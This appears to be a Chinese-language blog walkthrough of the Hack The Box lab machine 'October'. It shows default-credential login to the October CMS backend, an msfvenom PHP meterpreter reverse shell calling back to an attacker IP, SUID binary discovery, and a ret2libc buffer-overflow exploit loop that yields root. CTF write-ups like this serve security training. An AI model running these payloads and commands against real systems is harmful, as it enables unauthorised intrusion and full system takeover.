October

Posted by on 2020年3月5日


October

参考链接:
google-1
google-2
google-3

zenmap扫描端口

file

dirb扫描目录

file

访问:
http://10.10.10.16/backend/

file

Google:october cms default login
admin/admin

file

msf生成php reverse shell

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.45 lport=4444 -f raw > shell.php5

msf监听

msf > use exploit/multi/handler
msf > exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf > exploit(multi/handler) > set lhost 10.10.14.45
msf > exploit(multi/handler) > set lport 4444
msf > exploit(multi/handler) > run

media > upload
单击链接 get www shell

file
file

get tty shell,发现了一个有趣的文件

meterpreter  > shell
python -c "import pty;pty.spawn('/bin/bash')"
find / -perm -4000 2>/dev/null

file

下载下来准备分析文件

meterpreter > download /usr/local/bin/ovrflw /root/Desktop

file

查看程序中的字符串

strings ovrflw

file

查看保护机制,NX代表无法从堆栈中运行Shellcode

file

使用msf生成输入的payload

cd /usr/share/metasploit-framework/tools/exploit/
./pattern_create.rb -l 150

file

gdb调试,报错地址:0x64413764

gdb -q ovrflw
r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9

file

在112字符后存在溢出

./pattern_offset.rb -q 64413764 -l 150

file

靶机上gdb调试

gdb /usr/local/bin/ovrflw -q
(gdb) b main
(gdb) run
(gdb) p system
(gdb) find 0xb7610310, +99999999, "/bin/sh"
(gdb) x/s 0xb7732bac
(gdb) p exit

file

System:b75a5310
Exit:b7598260
/bin/sh:b76c7bac
在线编码转换工具:online-hex-converter

little endian format:
system:10 53 5A B7
exit:60 82 59 B7
/bin/sh:AC 7B 6C B7
“\x10\x53\x5A\xB7” + “\x60\x82\x59\xB7” + “\xAC\x7B\x6C\xB7”

file

get root shell

while true; do /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + "\x10\x53\x5A\xB7" + "\x60\x82\x59\xB7" + "\xAC\x7B\x6C\xB7"'); done

file

get user.txt | root.txt

file
file




发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据